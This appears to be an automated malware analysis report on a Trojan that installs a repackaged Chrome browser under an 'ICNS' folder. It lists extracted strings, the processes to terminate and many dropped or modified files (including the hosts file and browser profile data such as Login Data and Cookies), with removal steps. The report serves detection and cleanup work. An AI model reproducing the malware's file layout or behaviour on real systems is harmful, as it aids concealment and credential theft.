error %u
unspecified-crash-key
hurl-chunk-%i
prn-info-%d
registering_chrome
echrmstp.exe
app_host.exe
chrome.dll
chrome_child.dll
npchrome_frame.dll
chrome_frame_helper.exe
ChromeFrameHelperWindowClass
ChromeFrameReadyMode
chrome_launcher.exe
new_chrome.exe
old_chrome.exe
delegate_execute.exe
nacl64.exe
setup.exe
InstallerSuccessLaunchCmdLine
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Browse the web
Software\Microsoft\Windows\CurrentVersion\Uninstall\Chromium
{8A69D345-D564-463C-AFF1-A69D9E530F96}
{430FD4D0-B729-4F61-AA34-91526481799D}
GoogleUpdateSetup.exe
CFEndTempOptOutCmd
CFOptInCmd
CFOptOutCmd
CFTempOptOutCmd
UninstallCmdLine
WebAccessible
{4ea16ac7-fd5a-47c3-875b-dbf4a2008c20}
ChromeCanary
BGoogle Chrome Canary
-chrome
-chromeframe
{8A69D345-D564-463c-AFF1-A69D9E530F96}
{5C65F4B0-3651-4514-B207-D10CB699B14B}
hXXp://VVV.google.com/support/chrome/bin/request.py?hl=$1&contact_type=uninstall
BGoogle Chrome
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
%d.%d.%d
{8BA986DA-5100-405E-AA35-86F34A02ACBF}
BGoogle Chrome Frame
Google\Chrome Frame
Chrome in a Frame.
Uninstall Chrome Frame
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
{FDA71E6F-AC4C-4a00-8B70-9958A68906BF}
BGoogle Chrome App Launcher
ChromeAppList
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome App Launcher
{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}
Google Chrome binaries
%s\%s.dmp
rpcrt4.dll
dbghelp.dll
x-x-x-xx-xxxxxx
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_NLSTEXT
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
pipe\
Ckernel32.dll
ALPC Port
s0x%X
Cntdll.dll
wow_helper.exe"
GSOFTWARE\Policies\Google\Chrome
${windows}
Chrome_StatusTrayWindow
Reported Crashes.txt
testing_interface.dll
Certificate Revocation Lists
Custom Dictionary.txt
Login Data
Origin Bound Certs
Cached Theme.pak
Web Applications
pepflashplayer.dll
Software\Google\Chrome\Metro
CHROME_METRO_NAV_SEARCH_REQUEST
CHROME_METRO_GET_CURRENT_TAB_INFO
mscoree.dll
ADVAPI32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
nKERNEL32.DLL
WUSER32.DLL
DelegateExecute
\.exe
URL Protocol
webcal
https
.webp
.xhtml
.shtml
.html
Chrome HTML Document
ChromeHTML
Software\Microsoft\Windows\CurrentVersion\App Paths
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
gChrome_MessagePumpWindow_%p
HChrome_MessageWindow
Software\Classes\CLSID\{054AAE20-4BEA-4347-8A35-64A533254A9D}\LocalServer32
Software\Microsoft\Windows\CurrentVersion\Run
\StringFileInfo\xx\%ls
debug.log
.\debug.log
debug_message.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\chrome.exe
Google Chrome
30.0.1573.2
chrome_exe

chrome.exe_1308_rwx_3D20A000_00060000:

%A.VhE
Phy&A.Vh9
A.hUoA.
A.Vh%
@.QVt
@.qht
@.qit


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    iis.exe:448
    chrome.exe:2468
    chrome.exe:444
    chrome.exe:2068
    chrome.exe:2420
    chrome.exe:2100
    chrome.exe:3720
    wget.exe:2000

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\drivers\etc\hosts (793 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\wget.exe (7253 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\cin.exe.run (78 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\pt-BR.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\cs.pak (250 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\da.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\kn.pak (4074 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\icudt.dll (455362 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\cs.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\it.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\de.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\chrome.exe (30992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\he.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\nb.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\en-US.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\hi.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\es-419.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ca.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\zh-CN.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\gu.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\nl.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\bn.pak (2282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\pl.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fr.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sr.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sw.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ta.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ja.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\uk.pak (2282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\chrome.dll (794832 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\id.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ml.pak (4074 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\es.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\hr.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\en-GB.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\it.pak (250 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sk.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fi.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\et.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\el.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\uk.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\tr.pak (250 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fa.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\et.pak (2249 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\resources.pak (40311 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\th.pak (2282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\chrome_100_percent.pak (6625 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sw.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ar.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ar.pak (2282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\vi.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ro.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\libpeerconnection.dll (56491 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\bg.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\am.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\zh-TW.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ru.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fil.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sl.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\he.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\te.pak (3257 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\da.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\pt-PT.pak (250 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fi.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\PepperFlash\pepflashplayer.dll (277843 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\vi.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\hi.pak (2282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\de.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\en-US.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fa.pak (2282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ms.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\te.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\nl.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sv.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\mr.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ja.pak (1274 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\lv.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sl.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ca.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\nb.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ro.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ko.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\es.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sr.pak (2282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\lt.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ru.pak (2282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\am.pak (2282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\bg.pak (2282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\hu.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\en-GB.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ml.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\el.pak (3461 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\lv.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\mr.pak (2282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fil.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\hu.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\kn.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\bn.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\th.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\es-419.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\gu.pak (2282 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ms.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sv.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sk.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\tr.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fr.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\pl.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\hr.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\lt.pak (762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\id.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ta.pak (5049 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ko.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Network Action Predictor-journal (12870 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Shortcuts-journal (564 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_KebGwhiEGvOYBtm (131 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\8.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_IGvlFJjUqRhIydj (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\MANIFEST-000002 (69 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_S4AtrcJZtHDsWT1 (286 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_HfxwqJrUG9agR7Y (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\000001.dbtmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\data_0 (33644 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\data_1 (25936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\data_2 (5648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\data_3 (200 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_dQBYjDxcxcpVOz7 (131 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\7.tmp (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension Rules\LOG (47 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\MANIFEST-000001 (41 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Origin Bound Certs (495 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Login Data (1454 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Origin Bound Certs-journal (1682 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\History-journal (13168 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Favicons-journal (15988 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\6.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension Rules\000002.dbtmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\User StyleSheets\Custom.css (0 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_baqSUhrlvI2z50q (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\2.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\000002.dbtmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\5.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension Rules\MANIFEST-000001 (41 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension Rules\MANIFEST-000002 (69 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Top Sites-journal (12020 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_K3VyIMiaw5mZ0Y5 (286 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_G56vGeNP2h9gqCm (131 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\History Index 2014-04 (15028 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\B.tmp (129 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\9.tmp (328 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cookies (745 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7.tmp (23730 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\3.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\f_000002 (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\f_000001 (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Archived History (21037 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_SpKiY6DlpnTZ9Lc (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Current Session (4466 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_ubJaX3UoLepJd59 (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\First Run (0 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cookies-journal (2791 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Archived History-journal (12592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\index (368 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\History Index 2014-04-journal (15736 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Safe Browsing Cookies-journal (2791 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\4.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\LOG (47 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Web Data (31429 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Login Data-journal (564 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\000003.log (551 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_WzNZb1HdzReTbOR (286 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Web Data-journal (1612 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\1.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Visited Links (360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension Rules\000001.dbtmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\es\messages.json (590 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\hr\messages.json (526 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_metadata\verified_contents.json (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\hi\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\es_419\messages.json (548 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\css\craw_window.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sr\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\lv\messages.json (640 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\craw_background.js (12376 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\bg\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\fi\messages.json (602 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\tr\messages.json (607 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\nb\messages.json (533 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sl\messages.json (527 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button_pressed.png (160 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\craw_window.js (14776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\en\messages.json (474 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\html\craw_window.html (810 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\pt_BR\messages.json (560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\vi\messages.json (723 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\th\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\cs\messages.json (588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\et\messages.json (478 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ca\messages.json (567 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button_maximize.png (166 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\el\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\manifest.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\id\messages.json (474 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\fil\messages.json (549 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\de\messages.json (570 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button_close.png (252 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\zh_TW\messages.json (731 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sk\messages.json (596 bytes)
